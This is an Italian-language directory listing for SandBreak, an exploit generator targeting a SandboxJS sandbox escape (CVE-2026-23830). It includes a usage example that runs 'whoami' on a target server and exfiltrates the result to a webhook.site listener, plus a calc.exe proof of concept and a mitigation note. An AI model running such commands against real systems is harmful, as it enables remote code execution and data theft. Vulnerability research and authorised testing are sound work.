Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23830-SandBreak — Genera e fornisce payload di exploit per CVE-2026-23830, una sandbox escape di SandboxJS, con modalità per l'esfiltrazione OOB cieca e il PoC locale di calc. Supporta listener HTTP/HTTPS e produce payload JavaScript minificati. | Kitploit
Strumenti/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Genera e fornisce payload di exploit per CVE-2026-23830, una sandbox escape di SandboxJS, con modalità per l'esfiltrazione OOB cieca e il PoC locale di calc. Supporta listener HTTP/HTTPS e produce payload JavaScript minificati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1147 mesi faNon ancora revisionato
Condividi

SandBreak

Generatore di Exploit CVE-2026-23830 e Strumento Auto-Pwn

Go Version License Type

SandBreak è un robusto generatore di exploit basato su Go, progettato per sfruttare la vulnerabilità di Escape di SandboxJS (CVE-2026-23830).

Questo strumento sfrutta il costruttore AsyncFunction non protetto nelle versioni precedenti di sandboxjs, consentendo agli attaccanti di evadere dall'ambiente sandbox V8 ed eseguire codice arbitrario sul sistema host. Supporta molteplici modalità di payload, tra cui Exfiltrazione OOB Cieca, Defacement e RCE Basata su Errori.


Caratteristiche

  • 2 Modalità di Attacco:
    • oob: Exfiltrazione di Dati Out-of-Band (HTTP/HTTPS) per scenari ciechi.
    • calc: Apre calc.exe (PoC Classico).
  • OOB Intelligente: Rileva automaticamente HTTP vs HTTPS per prevenire crash del server.
  • Basato su Go: Singolo binario, nessuna dipendenza richiesta sulla macchina dell'attaccante.
  • Leggero: Genera payload JavaScript puri e minificati.

Installazione

Clona il repository ed esegui:

git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

Utilizzo

go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. Modalità OOB (RCE Cieca - Professionale)

Usala quando non hai feedback di output. Esegue il comando e invia il risultato codificato in Base64 al tuo listener (es. webhook.site).

go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

Bypassa con successo i crash di base del filtraggio egress gestendo gli errori di rete.

2. Modalità Calc (Test Locale)

Apre una calcolatrice sul server Windows.

go run CVE-2026-23830.go -mode calc

Prova di Concetto (PoC)

Scenario: Exfiltrazione OOB

L'attaccante riceve i dati utente del server tramite Webhook nonostante nessun output visivo sul sito.


Disclaimer

Questo strumento è creato esclusivamente per Scopi Educativi e Test di Penetrazione Autorizzati.

  • Non utilizzare questo strumento su sistemi che non possiedi o per cui non hai esplicita autorizzazione al test.
  • L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

Mitigazione

Aggiorna sandboxjs all'ultima versione in cui il costruttore AsyncFunction è correttamente isolato nella sandbox.

npm update sandboxjs

Autore: Meysam Bal-afkan

Licenza: MIT

Scarica lo strumento